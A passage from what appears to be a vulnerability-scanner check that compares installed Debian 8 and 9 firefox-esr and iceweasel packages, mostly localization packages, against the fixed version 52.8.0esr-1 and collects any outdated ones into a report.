res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 